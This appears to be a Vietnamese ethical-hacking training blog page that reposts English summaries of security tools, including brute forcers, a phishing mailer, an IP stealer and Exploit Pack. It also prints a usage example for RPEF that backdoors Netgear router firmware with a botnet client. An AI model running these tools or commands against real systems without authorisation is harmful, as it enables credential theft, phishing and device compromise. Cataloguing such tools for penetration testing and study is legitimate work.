Thủ Phủ Hacker Mũ Trắng Buôn Ma Thuột

Chương trình Đào tạo Hacker Mũ Trắng Việt Nam tại Thành phố Buôn Ma Thuột kết hợp du lịch. Khi đi là newbie - Khi về là HACKER MŨ TRẮNG !

Hacking Và Penetration Test Với Metasploit

Chương trình huấn luyện sử dụng Metasploit Framework để Tấn Công Thử Nghiệm hay Hacking của Security365.

Tài Liệu Computer Forensic Của C50

Tài liệu học tập về Truy Tìm Chứng Cứ Số (CHFI) do Security365 biên soạn phục vụ cho công tác đào tạo tại C50.

Sinh Viên Với Hacking Và Bảo Mật Thông Tin

Cuộc thi sinh viên cới Hacking. Với các thử thách tấn công trang web dành cho sinh viên trên nền Hackademic Challenge.

Tấn Công Và Phòng Thủ Với BackTrack / Kali Linux

Khóa học tấn công và phòng thủ với bộ công cụ chuyên nghiệp của các Hacker là BackTrack và Kali LINUX dựa trên nội dung Offensive Security

Sayfalar

Showing posts with label Mac. Show all posts
Showing posts with label Mac. Show all posts

PackETH - Ethernet Packet Generator


PackETH is GUI and CLI packet generator tool for ethernet. It allows you to create and send any possible packet or sequence of packets on the ethernet link. It is very simple to use, powerful and supports many adjustments of parameters while sending sequence of packets. And lastly, it has the most beautiful web site of all the packet generators.

Features & Video

  • you can create and send any ethernet packet. Supported protocols:
    • ethernet II, ethernet 802.3, 802.1q, QinQ, user defined ethernet frame
    • ARP, IPv4, IPv6, user defined network layer payload
    • UDP, TCP, ICMP, ICMPv6, IGMP, user defined transport layer payload
    • RTP (payload with options to send sin wave of any frequency for G.711)
    • JUMBO frames (if network driver supports it)
  • sending sequence of packets
    • delay between packets, number of packets to send
    • sending with max speed, approaching the theoretical boundary
    • change parameters while sending (change IP & mac address, UDP payload, 2 user defined bytes, etc.)
  • saving configuration to a file and load from it - pcap format supported


SNMP Brute - Fast SNMP brute force, enumeration, CISCO config downloader and password cracking script

SNMP brute force, enumeration, CISCO config downloader and password cracking script. Listens for any responses to the brute force community strings, effectively minimising wait time.

Requirements
  • metasploit
  • snmpwalk
  • snmpstat
  • john the ripper

Usage
python snmp-brute.py -t [IP]


Options
--help, -h show this help message and exit
--file=DICTIONARY, -f DICTIONARY Dictionary file
--target=IP, -t IP Host IP
--port=PORT, -p PORT SNMP port


Advanced
--rate=RATE, -r RATE Send rate
--timeout=TIMEOUT Wait time for UDP response (in seconds)
--delay=DELAY Wait time after all packets are send (in seconds)
--iplist=LFILE IP list file
--verbose, -v Verbose output


Automation
--bruteonly, -b Do not try to enumerate - only bruteforce
--auto, -a Non Interactive Mode
--no-colours No colour output


Operating Systems
--windows Enumerate Windows OIDs (snmpenum.pl)
--linux Enumerate Linux OIDs (snmpenum.pl)
--cisco Append extra Cisco OIDs (snmpenum.pl)


Alternative Options
--stdin, -s Read communities from stdin
--community=COMMUNITY, -c COMMUNITY Single Community String to use
--sploitego Sploitego's bruteforce method


Features
  • Brute forces both version 1 and version 2c SNMP community strings
  • Enumerates information for CISCO devices or if specified for Linux and Windows operating systems.
  • Identifies RW community strings
  • Tries to download the router config (metasploit module).
  • If the CISCO config file is downloaded, shows the plaintext passwords (metasploit module) and tries to crack hashed passords with John the Ripper


Dirs3arch v0.3.0 - HTTP(S) Directory/File Brute Forcer


dirs3arch is a simple command line tool designed to brute force hidden directories and files in websites.

It's written in python3 3 and all thirdparty libraries are included.

Operating Systems supported
  • Windows XP/7/8
  • GNU/Linux
  • MacOSX

Features
  • Multithreaded
  • Keep alive connections
  • Support for multiple extensions (-e|--extensions asp,php)
  • Reporting (plain text, JSON)
  • Detect not found web pages when 404 not found errors are masked (.htaccess, web.config, etc).
  • Recursive brute forcing
  • HTTP(S) proxy support
  • Batch processing (-L)

Examples
  • Scan www.example.com/admin/ to find php files:
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php
  • Scan www.example.com to find asp and aspx files with SSL:
    python3 dirs3arch.py -u https://www.example.com/ -e asp,aspx
  • Scan www.example.com with an alternative dictionary (from DirBuster):
    python3 dirs3arch.py -u http://www.example.com/ -e php -w db/dirbuster/directory-list-2.3-small.txt
  • Scan with HTTP proxy (localhost port 8080):
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --http-proxy localhost:8080
  • Scan with custom User-Agent and custom header (Referer):
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --user-agent "My User-Agent" --header "Referer: www.google.com"
  • Scan recursively:
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php -r
  • Scan recursively excluding server-status directory and 200 status codes:
    python3 dirs3arch.py -u http://www.example.com/ -e php -r --exclude-subdir "server-status" --exclude-status 200
  • Scan includes, classes directories in /admin/
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --scan-subdir "includes, classes"
  • Scan without following HTTP redirects:
    python3 dirs3arch.py -u http://www.example.com/ -e php --no-follow-redirects
  • Scan VHOST "backend" at IP 192.168.1.1:
    python3 dirs3arch.py -u http://backend/ --ip 192.168.1.1
  • Scan www.example.com to find wordpress plugins:
    python3 dirs3arch.py -u http://www.example.com/wordpress/wp-content/plugins/ -e php -w db/wordpress/plugins.txt

  • Batch processing:
    python3 dirs3arch.py -L urllist.txt -e php


Thirdparty code
  • colorama
  • oset
  • urllib3
  • sqlmap

Changelog
  • 0.3.0 - 2015.2.5 Fixed issue3, fixed timeout exception, ported to python33, other bugfixes
  • 0.2.7 - 2014.11.21 Added Url List feature (-L). Changed output. Minor Fixes
  • 0.2.6 - 2014.9.12 Fixed bug when dictionary size is greater than threads count. Fixed URL encoding bug (issue2).
  • 0.2.5 - 2014.9.2 Shows Content-Length in output and reports, added default.conf file (for setting defaults) and report auto save feature added.
  • 0.2.4 - 2014.7.17 Added Windows support, --scan-subdir|--scan-subdirs argument added, --exclude-subdir|--exclude-subdirs added, --header argument added, dirbuster dictionaries added, fixed some concurrency bugs, MVC refactoring
  • 0.2.3 - 2014.7.7 Fixed some bugs, minor refactorings, exclude status switch, "pause/next directory" feature, changed help structure, expaded default dictionary
  • 0.2.2 - 2014.7.2 Fixed some bugs, showing percentage of tested paths and added report generation feature
  • 0.2.1 - 2014.5.1 Fixed some bugs and added recursive option
  • 0.2.0 - 2014.1.31 Initial public release

IP Thief - Simple IP Stealer in PHP


A simple PHP script to capture the IP address of anyone that send the "imagen.php" file with the following options:
[+] It comes with an administrator to view and delete IP
[+] You can change the redirect URL image
[+] Can you see the country of the visitor


Socat - Multipurpose relay (SOcket CAT)

Socat is a utility similar to the venerable Netcat that works over a number of protocols and through a files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.

Socat is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes.

Filan is a utility that prints information about its active file descriptors to stdout. It has been written for debugging socat, but might be useful for other purposes too. Use the -h option to find more infos.

Procan is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging socat, but might be useful for other purposes too.

The life cycle of a socat instance typically consists of four phases.

In the init phase, the command line options are parsed and logging is initialized.

During the open phase, socat opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.

In the transfer phase, socat watches both streams' read and write file descriptors via select(), and, when data is available on one side andcan be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.

When one of the streams effectively reaches EOF, the closing phase begins. Socat transfers the EOF condition to the other stream, i.e. tries to shutdown only its write stream, giving it a chance to terminate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and terminates.

OPTIONS

Socat provides some command line options that modify the behaviour of the program. They have nothing to do with so called address options that are used as parts of address specifications.

-V
Print version and available feature information to stdout, and exit.
-h | -?
Print a help text to stdout describing command line options and available address types, and exit.
-hh | -??
Like -h, plus a list of the short names of all available address options. Some options are platform dependend, so this output is helpful for checking the particular implementation.
-hhh | -???
Like -hh, plus a list of all available address option names.
-d
Without this option, only fatal and error messages are generated; applying this option also prints warning messages. See DIAGNOSTICS for more information.
-d -d
Prints fatal, error, warning, and notice messages.
-d -d -d
Prints fatal, error, warning, notice, and info messages.
-d -d -d -d
Prints fatal, error, warning, notice, info, and debug messages.
-D
Logs information about file descriptors before starting the transfer phase.
-ly[<facility>]
Writes messages to syslog instead of stderr; severity as defined with -d option. With optional <facility>, the syslog type can be selected, default is "daemon". Third party libraries might not obey this option.
-lf <logfile>
Writes messages to <logfile> [filename] instead of stderr. Some third party libraries, in particular libwrap, might not obey this option.
-ls
Writes messages to stderr (this is the default). Some third party libraries might not obey this option, in particular libwrap appears to only log to syslog.
-lp<progname>
Overrides the program name printed in error messages and used for constructing environment variable names.
-lu
Extends the timestamp of error messages to microsecond resolution. Does not work when logging to syslog.
-lm[<facility>]
Mixed log mode. During startup messages are printed to stderr; when socat starts the transfer phase loop or daemon mode (i.e. after opening all streams and before starting data transfer, or, with listening sockets with fork option, before the first accept call), it switches logging to syslog. With optional <facility>, the syslog type can be selected, default is "daemon".
-lh
Adds hostname to log messages. Uses the value from environment variable HOSTNAME or the value retrieved with uname() if HOSTNAME is not set.
-v
Writes the transferred data not only to their target streams, but also to stderr. The output format is text with some conversions for readability, and prefixed with "> " or "< " indicating flow directions.
-x
Writes the transferred data not only to their target streams, but also to stderr. The output format is hexadecimal, prefixed with "> " or "< " indicating flow directions. Can be combined with -v.
-b<size>
Sets the data transfer block <size> [size_t]. At most <size> bytes are transferred per step. Default is 8192 bytes.
-s
By default, socat terminates when an error occurred to prevent the process from running when some option could not be applied. With this option, socat is sloppy with errors and tries to continue. Even with this option, socat will exit on fatals, and will abort connection attempts when security checks failed.
-t<timeout>
When one channel has reached EOF, the write part of the other channel is shut down. Then, socat waits <timeout> [timeval] seconds before terminating. Default is 0.5 seconds. This timeout only applies to addresses where write and read part can be closed independently. When during the timeout interval the read part gives EOF, socat terminates without awaiting the timeout.
-T<timeout>
Total inactivity timeout: when socat is already in the transfer loop and nothing has happened for <timeout> [timeval] seconds (no data arrived, no interrupt occurred...) then it terminates. Useful with protocols like UDP that cannot transfer EOF.
-u
Uses unidirectional mode. The first address is only used for reading, and the second address is only used for writing (example).
-U
Uses unidirectional mode in reverse direction. The first address is only used for writing, and the second address is only used for reading.
-g
During address option parsing, don't check if the option is considered useful in the given address environment. Use it if you want to force, e.g., appliance of a socket option to a serial device.
-L<lockfile>
If lockfile exists, exits with error. If lockfile does not exist, creates it and continues, unlinks lockfile on exit.
-W<lockfile>
If lockfile exists, waits until it disappears. When lockfile does not exist, creates it and continues, unlinks lockfile on exit.
-4
Use IP version 4 in case that the addresses do not implicitly or explicitly specify a version; this is the default.
-6
Use IP version 6 in case that the addresses do not implicitly or explicitly specify a version. 


PhEmail - Automate Sending Phishing Emails


PhEmail is a python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test. The main purpose of PhEmail is to send a bunch of phishing emails and prove who clicked on them without attempting to exploit the web browser or email client but collecting as much information as possible. PhEmail comes with an engine to garther email addresses through LinkedIN, useful during the information gathering phase. Also, this tool supports Gmail authentication which is a valid option in case the target domain has blacklisted the source email or IP address. Finally, this tool can be used to clone corporate login portals in order to steal login credentials.

Usage

PHishing EMAIL tool v0.13
Usage: phemail.py [-e <emails>] [-m <mail_server>] [-f <from_address>] [-r <replay_address>] [-s <subject>] [-b <body>]
-e emails: File containing list of emails (Default: emails.txt)
-f from_address: Source email address displayed in FROM field of the email (Default: Name Surname <name_surname@example.com>)
-r reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname <name_surname@example.com>)
-s subject: Subject of the email (Default: Newsletter)
-b body: Body of the email (Default: body.txt)
-p pages: Specifies number of results pages searched (Default: 10 pages)
-v verbose: Verbose Mode (Default: false)
-l layout: Send email with no embedded pictures
-B BeEF: Add the hook for BeEF
-m mail_server: SMTP mail server to connect to
-g Google: Use a google account username:password
-t Time delay: Add deleay between each email (Default: 3 sec)
-R Bunch of emails per time (Default: 10 emails)
-L webserverLog: Customise the name of the webserver log file (Default: Date time in format "%d_%m_%Y_%H_%M")
-S Search: query on Google
-d domain: of email addresses
-n number: of emails per connection (Default: 10 emails)
-c clone: Clone a web page
-w website: where the phishing email link points to
-o save output in a file
-F Format (Default: 0):
0- firstname surname
1- firstname.surname@example.com
2- firstnamesurname@example.com
3- f.surname@example.com
4- firstname.s@example.com
5- surname.firstname@example.com
6- s.firstname@example.com
7- surname.f@example.com
8- surnamefirstname@example.com
9- firstname_surname@example.com

Examples: phemail.py -e emails.txt -f "Name Surname <name_surname@example.com>" -r "Name Surname <name_surname@example.com>" -s "Subject" -b body.txt
phemail.py -S example -d example.com -F 1 -p 12
phemail.py -c https://example.com


Disclaimer

Usage of PhEmail for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.


JADX - Java source code from Android Dex and Apk files


Command line and GUI tools for produce Java source code from Android Dex and Apk files.

Usage

jadx[-gui] [options] <input file> (.dex, .apk, .jar or .class)
options:
-d, --output-dir - output directory
-j, --threads-count - processing threads count
-f, --fallback - make simple dump (using goto instead of 'if', 'for', etc)
--cfg - save methods control flow graph to dot file
--raw-cfg - save methods control flow graph (use raw instructions)
-v, --verbose - verbose output
-h, --help - print this help
Example:
jadx -d out classes.dex


MalwaRE - Malware Repository Framework


malwaRE is a malware repository website created using PHP Laravel framework, used to manage your own malware zoo. malwaRE was based on the work of Adlice team with some extra features.

If you guys have any improvements, please let me know or send me a pull request.

Features
  • Self-hosted solution (PHP/Mysql server needed)
  • VirusTotal results (option for uploading unknown samples)
  • Search filters available (vendor, filename, hash, tag)
  • Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
  • Add writeup url(s) for each sample
  • Manage samples by tag
  • Tag autocomplete
  • VirusTotal rescan button (VirusTotal's score column)
  • Download samples from repository

CapTipper - Malicious HTTP traffic explorer tool


CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.

CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool provides the security researcher with easy access to the files and the understanding of the network flow,and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.
Feeding CapTipper with a drive-by traffic capture (e.g of an exploit kit) displays the user with the requests URI's that were sent and responses meta-data.

The user can at this point browse to http://127.0.0.1/[URI] and receive the response back to the browser.

In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more...



Ghiro 0.2 - Automated Digital Image Forensics Tool


Sometime forensic investigators need to process digital images as evidence. There are some tools around, otherwise it is difficult to deal with forensic analysis with lot of images involved.

Images contain tons of information, Ghiro extracts these information from provided images and display them in a nicely formatted report.

Dealing with tons of images is pretty easy, Ghiro is designed to scale to support gigs of images.

All tasks are totally automated, you have just to upload you images and let Ghiro does the work.

Understandable reports, and great search capabilities allows you to find a needle in a haystack.

Ghiro is a multi user environment, different permissions can be assigned to each user. Cases allow you to group image analysis by topic, you can choose which user allow to see your case with a permission schema.

Use Cases

Ghiro can be used in many scenarios, forensic investigators could use it on daily basis in their analysis lab but also people interested to undercover secrets hidden in images could benefit. Some use case examples are the following:
  • If you need to extract all data and metadata hidden in an image in a fully automated way
  • If you need to analyze a lot of images and you have not much time to read the report for all them
  • If you need to search a bunch of images for some metadata
  • If you need to geolocate a bunch of images and see them in a map
  • If you have an hash list of "special" images and you want to search for them

Anyway Ghiro is designed to be used in many other scenarios, the imagination is the only limit.

Video

MAIN FEATURES

Metadata extraction

Metadata are divided in several categories depending on the standard they come from. Image metadata are extracted and categorized. For example: EXIF, IPTC, XMP.

GPS Localization

Embedded in the image metadata sometimes there is a geotag, a bit of GPS data providing the longitude and latitude of where the photo was taken, it is read and the position is displayed on a map.

MIME information

The image MIME type is detected to know the image type your are dealing with, in both contacted (example: image/jpeg) and extended form.

Error Level Analysis

Error Level Analysis (ELA) identifies areas within an image that are at different compression levels. The entire picture should be at roughly the same level, if a difference is detected, then it likely indicates a digital modification.

Thumbnail extraction

The thumbnails and data related to them are extracted from image metadata and stored for review.

Thumbnail consistency

Sometimes when a photo is edited, the original image is edited but the thumbnail not. Difference between the thumbnails and the images are detected. 

Signature engine 

Over 120 signatures provide evidence about most critical data to highlight focal points and common exposures.

Hash matching

Suppose you are searching for an image and you have only the hash. You can provide a list of hashes and all images matching are reported.


Gitrob - Reconnaissance tool for GitHub organizations


Gitrob is a command line tool that can help organizations and security professionals find such sensitive information. The tool will iterate over all public organization and member repositories and match filenames against a range of patterns for files, that typically contain sensitive or dangerous information.

How it works

Looking for sensitive information in GitHub repositories is not a new thing, it has been known for a while that things such as private keys and credentials can be found with GitHub's search functionality, however Gitrob makes it easier to focus the effort on a specific organization.

The first thing the tool does is to collect all public repositories of the organization itself. It then goes on to collect all the organization members and their public repositories, in order to compile a list of repositories that might be related or have relevance to the organization.

When the list of repositories has been compiled, it proceeds to gather all the filenames in each repository and runs them through a series of observers that will flag the files, if they match any patterns of known sensitive files. This step might take a while if the organization is big or if the members have a lot of public repositories.

All of the members, repositories and files will be saved to a PostgreSQL database. When everything has been sifted through, it will start a Sinatra web server locally on the machine, which will serve a simple web application to present the collected data for analysis.


Exploit Pack - Open Source Security Project for Penetration Testing and Exploit Development


Exploit Pack, is an open source GPLv3 security tool, this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Iimpact are ready to use as well but you will require an expensive license to get access to all the features, for example: automatic exploit launching, full report capabilities, reverse shell agent customization, etc. Exploit Pack is fully free, open source and GPLv3. Because this is an open source project you can always modify it, add or replace features and get involved into the next project decisions, everyone is more than welcome to participate. We developed this tool thinking for and as pentesters. As security professionals we use Exploit Pack on a daily basis to deploy real environment attacks into real corporate clients.

Video demonstration of the latest Exploit Pack release:


More than 300+ exploits

Military grade professional security tool

Exploit Pack comes into the scene when you need to execute a pentest in a real environment, it will provide you with all the tools needed to gain access and persist by the use of remote reverse agents.

Remote Persistent Agents

Reverse a shell and escalate privileges

Exploit Pack will provide you with a complete set of features to create your own custom agents, you can include exploits or deploy your own personalized shellcodes directly into the agent.

Write your own Exploits

Use Exploit Pack as a learning platform

Quick exploit development, extend your capabilities and code your own custom exploits using the Exploit Wizard and the built-in Python Editor moded to fullfill the needs of an Exploit Writer.


ProGuard - Java class file Shrinker, Optimizer, Obfuscator and Preverifier


ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes. It optimizes bytecode and removes unused instructions. It renames the remaining classes, fields, and methods using short meaningless names. Finally, it preverifies the processed code for Java 6 or higher, or for Java Micro Edition. 

Some uses of ProGuard are:
  • Creating more compact code, for smaller code archives, faster transfer across networks, faster loading, and smaller memory footprints.
  • Making programs and libraries harder to reverse-engineer.
  • Listing dead code, so it can be removed from the source code.
  • Retargeting and preverifying existing class files for Java 6 or higher, to take full advantage of their faster class loading.

ProGuard's main advantage compared to other Java obfuscators is probably its compact template-based configuration. A few intuitive command line options or a simple configuration file are usually sufficient. The user manual explains all available options and shows examples of this powerful configuration style.

ProGuard is fast. It only takes seconds to process programs and libraries of several megabytes. The results section presents actual figures for a number of applications.

ProGuard is a command-line tool with an optional graphical user interface. It also comes with plugins for Ant, for Gradle, and for the JME Wireless Toolkit.


What is shrinking?

Java source code (.java files) is typically compiled to bytecode (.class files). Bytecode is more compact than Java source code, but it may still contain a lot of unused code, especially if it includes program libraries. Shrinking programs such as ProGuard can analyze bytecode and remove unused classes, fields, and methods. The program remains functionally equivalent, including the information given in exception stack traces.

What is obfuscation?

By default, compiled bytecode still contains a lot of debugging information: source file names, line numbers, field names, method names, argument names, variable names, etc. This information makes it straightforward to decompile the bytecode and reverse-engineer entire programs. Sometimes, this is not desirable. Obfuscators such as ProGuard can remove the debugging information and replace all names by meaningless character sequences, making it much harder to reverse-engineer the code. It further compacts the code as a bonus. The program remains functionally equivalent, except for the class names, method names, and line numbers given in exception stack traces.

What is preverification?

When loading class files, the class loader performs some sophisticated verification of the byte code. This analysis makes sure the code can't accidentally or intentionally break out of the sandbox of the virtual machine. Java Micro Edition and Java 6 introduced split verification. This means that the JME preverifier and the Java 6 compiler add preverification information to the class files (StackMap and StackMapTable attributes, respectively), in order to simplify the actual verification step for the class loader. Class files can then be loaded faster and in a more memory-efficient way. ProGuard can perform the preverification step too, for instance allowing to retarget older class files at Java 6.

What kind of optimizations does ProGuard support?

Apart from removing unused classes, fields, and methods in the shrinking step, ProGuard can also perform optimizations at the bytecode level, inside and across methods. Thanks to techniques like control flow analysis, data flow analysis, partial evaluation, static single assignment, global value numbering, and liveness analysis, ProGuard can:
  • Evaluate constant expressions.
  • Remove unnecessary field accesses and method calls.
  • Remove unnecessary branches.
  • Remove unnecessary comparisons and instanceof tests.
  • Remove unused code blocks.
  • Merge identical code blocks.
  • Reduce variable allocation.
  • Remove write-only fields and unused method parameters.
  • Inline constant fields, method parameters, and return values.
  • Inline methods that are short or only called once.
  • Simplify tail recursion calls.
  • Merge classes and interfaces.
  • Make methods private, static, and final when possible.
  • Make classes static and final when possible.
  • Replace interfaces that have single implementations.
  • Perform over 200 peephole optimizations, like replacing ...*2 by ...<<1.
  • Optionally remove logging code.
The positive effects of these optimizations will depend on your code and on the virtual machine on which the code is executed. Simple virtual machines may benefit more than advanced virtual machines with sophisticated JIT compilers. At the very least, your bytecode may become a bit smaller.
Some notable optimizations that aren't supported yet:
  • Moving constant expressions out of loops.
  • Optimizations that require escape analysis (DexGuard does).

Tribler - Download Torrents using Tor-inspired onion routing


Tribler is a research project of Delft University of Technology. Tribler was created over nine years ago as a new open source Peer-to-Peer file sharing program. During this time over one million users have installed it successfully and three generations of Ph.D. students tested their algorithms in the real world.

Tribler is the first client which continuously improves upon the aging BitTorrent protocol from 2001 and addresses its flaws. We expanded it with, amongst others, streaming from magnet links, keyword search for content, channels and reputation-management. All these features are implemented in a completely distributed manner, not relying on any centralized component. Still, Tribler manages to remain fully backwards compatible with BitTorrent.

Work on Tribler has been supported by multiple Internet research European grants. In total we received 3,538,609 Euro in funding for our open source self-organising systems research.
Roughly 10 to 15 scientists and engineers work on it full-time. Our ambition is to make darknet technology, security and privacy the default for all Internet users. As of 2013 we have received code from 46 contributors and 143.705 lines of code.

Vision & Mission

"Push the boundaries of self-organising systems, robust reputation systems and craft collaborative systems with millions of active participants under continuous attack from spammers and other adversarial entities."


Crowbar - Brute Forcing Tool for Pentests


Crowbar (crowbar) is brute forcing tool that can be used during penetration tests. It is developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example, while most brute forcing tools use username and password for SSH brute force, Crowbar uses SSH key. So SSH keys, that are obtained during penetration tests, can be used to attack other SSH servers.

Currently Crowbar supports
  • OpenVPN
  • SSH private key authentication
  • VNC key authentication
  • Remote Desktop Protocol (RDP) with NLA support
Installation

First you shoud install dependencies
 # apt-get install openvpn freerdp-x11 vncviewer
Then get latest version from github
 # git clone https://github.com/galkan/crowbar 
Attention: Rdp depends on your Kali version. It may be xfreerdp for the latest version.

Usage

-h: Shows help menu.
-b: Target service. Crowbar now supports vnckey, openvpn, sshkey, rdp.
-s: Target ip address.
-S: File name which is stores target ip address.
-u: Username.
-U: File name which stores username list.
-n: Thread count.
-l: File name which stores log. Deafault file name is crwobar.log which is located in your current directory
-o: Output file name which stores the successfully attempt.
-c: Password.
-C: File name which stores passwords list.
-t: Timeout value.
-p: Port number
-k: Key file full path.
-m: Openvpn configuration file path
-d: Run nmap in order to discover whether the target port is open or not. So that you can easily brute to target using crowbar.
-v: Verbose mode which is shows all the attempts including fail.
If you want see all usage options, please use crowbar --help



Tcpcrypt - Encrypting the Internet


Tcpcrypt is a protocol that attempts to encrypt (almost) all of your network traffic. Unlike other security mechanisms, Tcpcrypt works out of the box: it requires no configuration, no changes to applications, and your network connections will continue to work even if the remote end does not support Tcpcrypt, in which case connections will gracefully fall back to standard clear-text TCP. Install Tcpcrypt and you'll feel no difference in your every day user experience, but yet your traffic will be more secure and you'll have made life much harder for hackers.

So why is now the right time to turn on encryption? Here are some reasons:
  • Intercepting communications today is simpler than ever because of wireless networks. Ask a hacker how many e-mail passwords can be intercepted at an airport by just using a wifi-enabled laptop. This unsophisticated attack is in reach of many. The times when only a few elite had the necessary skill to eavesdrop are gone.
  • Computers have now become fast enough to encrypt all Internet traffic. New computers come with special hardware crypto instructions that allow encrypted networking speeds of 10Gbit/s. How many of us even achieve those speeds on the Internet or would want to download (and watch) one movie per second? Clearly, we can encrypt fast enough.
  • Research advances and the lessons learnt from over 10 years of experience with the web finally enabled us to design a protocol that can be used in today's Internet, by today's users. Our protocol is pragmatic: it requires no changes to applications, it works with NATs (i.e., compatible with your DSL router), and will work even if the other end has not yet upgraded to tcpcrypt—in which case it will gracefully fall back to using the old plain-text TCP. No user configuration is required, making it accessible to lay users—no more obscure requests like "Please generate a 2048-bit RSA-3 key and a certificate request for signing by a CA". Tcpcrypt can be incrementally deployed today, and with time the whole Internet will become encrypted.

How Tcpcrypt works

Tcpcrypt is opportunistic encryption. If the other end speaks Tcpcrypt, then your traffic will be encrypted; otherwise it will be in clear text. Thus, Tcpcrypt alone provides no guarantees—it is best effort. If, however, a Tcpcrypt connection is successful and any attackers that exist are passive, then Tcpcrypt guarantees privacy.

Network attackers come in two varieties: passive and active (man-in-the-middle). Passive attacks are much simpler to execute because they just require listening on the network. Active attacks are much harder as they require listening and modifying network traffic, often requiring very precise timing that can make some attacks impractical.

By default Tcpcrypt is vulnerable to active attacks—an attacker can, for example, modify a server's response to say that Tcpcrypt is not supported (when in fact it is) so that all subsequent traffic will be clear text and can thus be eavesdropped on.

Tcpcrypt, however, is powerful enough to stop active attacks, too, if the application using it performs authentication. For example, if you log in to online banking using a password and the connection is over Tcpcrypt, it is possible to use that shared secret between you and the bank (i.e., the password) to authenticate that you are actually speaking to the bank and not some active (man-in-the-middle) attacker. The attacker cannot spoof authentication as it lacks the password. Thus, by default, Tcpcrypt will try its best to protect your traffic. Applications requiring stricter guarantees can get them by authenticating a Tcpcrypt session.

How Tcpcrypt is different

Some of us already encrypt some network traffic using SSL (e.g., HTTPS) or VPNs. Those solutions are inadequate for ubiquitous encryption. For example, almost all solutions rely on a PKI to stop man-in-the-middle attacks, which for ubiquitous deployment would mean that all Internet users would have to get verified by a CA like Verisign and have to spend money to buy a certificate. Tcpcrypt abstracts away authentication, allowing any mechanism to be used, whether PKI, passwords, or something else.
Next, Tcpcrypt can be incrementally deployed: it has a mechanism for probing support and can gracefully fall back to TCP. It also requires no configuration (try that with a VPN!) and has no NAT issues. Finally, Tcpcrypt has very high performance (up to 25x faster than SSL), making it feasible for high volume servers to enable encryption on all connections. While weaker by default, Tcpcrypt is more realistic for universal deployment.

We can easily make the bar much higher for attackers, so let's do it. How much longer are we going to stay clear-text by default?


RPEF - Abstracts and expedites the process of backdooring stock firmware images for consumer/SOHO routers


Router Post-Exploitation Framework

Currently, the framework includes a number of firmware image modules:
'Verified'   - This module is confirmed to work and is stable.

'Unverified' - This module is believed to work or should work with
little additional effort, but awaits being tested on a
physical device.

'Testing' - This module is currently undergoing development and is
unstable for the time being. Users should consider this
module a "work in progress."

'Roadblock' - Issues have halted progress on this module for the time
being. Certain unavailable utilities or significant
reverse engineering work may be necessary.
For a list of options, run:
./rpef.py -h
For a list of all currently supported firmware targets, run:
./rpef.py -ll

The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:
./rpef.py <firmware image> <output file> <payload>
and accepts a number of optional switches (see -h).
The rules/ directory stores a hierarchy of rules// directories. One module correlates to one firmware checksum (not to one specific router) since multiple routers have been observed to run the exact same firmware. Within each module is properties.json which stores the language and order of operations necessary to unpackage, backdoor, and repackage the target firmware image. The payloads/ directory stores cross-compiled binaries ready for deployment, and the optional dependencies/ directory stores miscellaneous files to aid the process.
The utilities/ directory stores pre-compiled x86 binaries to perform tasks such as packing/unpacking filesystems, compressing/decompressing data (for which no suitable .py module exists), and calculating checksums.
The payloads_src/ directory stores source code for the payloads themselves. All payloads are written from scratch to keep them as small as possible.

Usage

To verbosely generate a firmware image for the WGR614v9 backdoored with a botnet client, run:
./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
And the process should proceed as follows:
$ ./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
[+] Verifying checksum
Calculated checksum: 767c962037b32a5e800c3ff94a45e85e
Matched target: NETGEAR WGR614v9 1.2.30NA (Verified)
[+] Extracting parts from firmware image
Step 1: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 58, Size 456708 -> /tmp/tmpOaw1tn/headerkernel.bin
Step 2: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 456766, Size 1476831 -> /tmp/tmpOaw1tn/filesystem.bin
[+] Unpacking filesystem
Step 1: unsquashfs-1.0 /tmp/tmpOaw1tn/filesystem.bin -> /tmp/tmpOaw1tn/extracted_fs
Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/filesystem.bin

created 217 files
created 27 directories
created 48 symlinks
created 0 devices
created 0 fifos
[+] Inserting payload
